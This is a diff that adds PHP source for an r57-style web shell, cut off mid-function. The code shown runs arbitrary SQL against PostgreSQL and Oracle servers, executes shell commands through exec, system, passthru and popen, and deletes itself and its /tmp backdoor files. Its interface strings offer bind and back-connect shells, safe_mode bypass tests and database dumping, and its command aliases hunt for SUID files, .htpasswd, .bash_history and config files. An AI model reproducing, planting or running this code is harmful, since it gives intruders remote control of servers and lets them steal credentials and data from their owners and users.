+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+Выбор языка
+$language='eng' - русский
+$language='ru' - английский
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'Выполненная команда',
+'ru_text2' =>'Выполнение команд на сервере',
+'ru_text3' =>'Выполнить команду',
+'ru_text4' =>'Рабочая директория',
+'ru_text5' =>'Загрузка файлов на сервер',
+'ru_text6' =>'Локальный файл',
+'ru_text7' =>'Алиасы',
+'ru_text8' =>'Выберите алиас',
+'ru_butt1' =>'Выполнить',
+'ru_butt2' =>'Загрузить',
+'ru_text9' =>'Открытие порта и привязка его к /bin/bash',
+'ru_text10'=>'Открыть порт',
+'ru_text11'=>'Пароль для доступа',
+'ru_butt3' =>'Открыть',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-адрес',
+'ru_text14'=>'Порт',
+'ru_butt4' =>'Выполнить',
+'ru_text15'=>'Загрузка файлов с удаленного сервера',
+'ru_text16'=>'Использовать',
+'ru_text17'=>'Удаленный файл',
+'ru_text18'=>'Локальный файл',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'Использовать',
+'ru_text21'=>'Новое имя',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Локальный порт',
+'ru_text24'=>'Удаленный хост',
+'ru_text25'=>'Удаленный порт',
+'ru_text26'=>'Использовать',
+'ru_butt5' =>'Запустить',
+'ru_text28'=>'Работа в safe_mode',
+'ru_text29'=>'Доступ запрещен',
+'ru_butt6' =>'Сменить',
+'ru_text30'=>'Просмотр файла',
+'ru_butt7' =>'Вывести',
+'ru_text31'=>'Файл не найден',
+'ru_text32'=>'Выполнение PHP кода',
+'ru_text33'=>'Проверка возможности обхода ограничений open_basedir через функции cURL',
+'ru_butt8' =>'Проверить',
+'ru_text34'=>'Проверка возможности обхода ограничений safe_mode через функцию include',
+'ru_text35'=>'Проверка возможности обхода ограничений safe_mode через загрузку файла в mysql',
+'ru_text36'=>'База',
+'ru_text37'=>'Логин',
+'ru_text38'=>'Пароль',
+'ru_text39'=>'Таблица',
+'ru_text40'=>'Дамп таблицы базы данных',
+'ru_butt9' =>'Дамп',
+'ru_text41'=>'Сохранить в файле',
+'ru_text42'=>'Редактирование файла',
+'ru_text43'=>'Редактировать файл',
+'ru_butt10'=>'Сохранить',
+'ru_butt11'=>'Редактировать',
+'ru_text44'=>'Редактирование файла невозможно! Доступ только для чтения!',
+'ru_text45'=>'Файл сохранен',
+'ru_text46'=>'Просмотр phpinfo()',
+'ru_text47'=>'Просмотр настроек php.ini',
+'ru_text48'=>'Удаление временных файлов',
+'ru_text49'=>'Удаление скрипта с сервера',
+'ru_text50'=>'Информация о процессоре',
+'ru_text51'=>'Информация о памяти',
+'ru_text52'=>'Текст для поиска',
+'ru_text53'=>'Искать в папке',
+'ru_text54'=>'Поиск текста в файлах',
+'ru_butt12'=>'Найти',
+'ru_text55'=>'Только в файлах',
+'ru_text56'=>'Ничего не найдено',
+'ru_text57'=>'Создать/Удалить Файл/Директорию',
+'ru_text58'=>'Имя',
+'ru_text59'=>'Файл',
+'ru_text60'=>'Директорию',
+'ru_butt13'=>'Создать/Удалить',
+'ru_text61'=>'Файл создан',
+'ru_text62'=>'Директория создана',
+'ru_text63'=>'Файл удален',
+'ru_text64'=>'Директория удалена',
+'ru_text65'=>'Создать',
+'ru_text66'=>'Удалить',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Команда',
+'ru_text69'=>'Параметр1',
+'ru_text70'=>'Параметр2',
+'ru_text71'=>"Второй параметр команды:\r\n- для CHOWN - имя нового пользователя или его UID (числом) \r\n- для команды CHGRP - имя группы или GID (числом) \r\n- для команды CHMOD - целое число в восьмеричном представлении (например 0777)",
+'ru_text72'=>'Текст для поиска',
+'ru_text73'=>'Искать в папке',
+'ru_text74'=>'Искать в файлах',
+'ru_text75'=>'* можно использовать регулярное выражение',
+'ru_text76'=>'Поиск текста в файлах с помощью утилиты find',
+'ru_text77'=>'Просмотр структуры базы данных',
+'ru_text78'=>'Показывать таблицы',
+'ru_text79'=>'Показывать столбцы',
+'ru_text80'=>'Тип',
+'ru_text81'=>'Сеть',
+'ru_text82'=>'Базы данных',
+'ru_text83'=>'Выполнение SQL запроса',
+'ru_text84'=>'SQL запрос',
+'ru_text85'=>'Проверка возможности обхода ограничений safe_mode через выполнение команд в MSSQL сервере',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+Алиасы команд
+Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени )
+Вы можете сами добавлять или изменять команды.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>и</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу записать в файл '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу прочитать файл '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "Не удалось создать "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
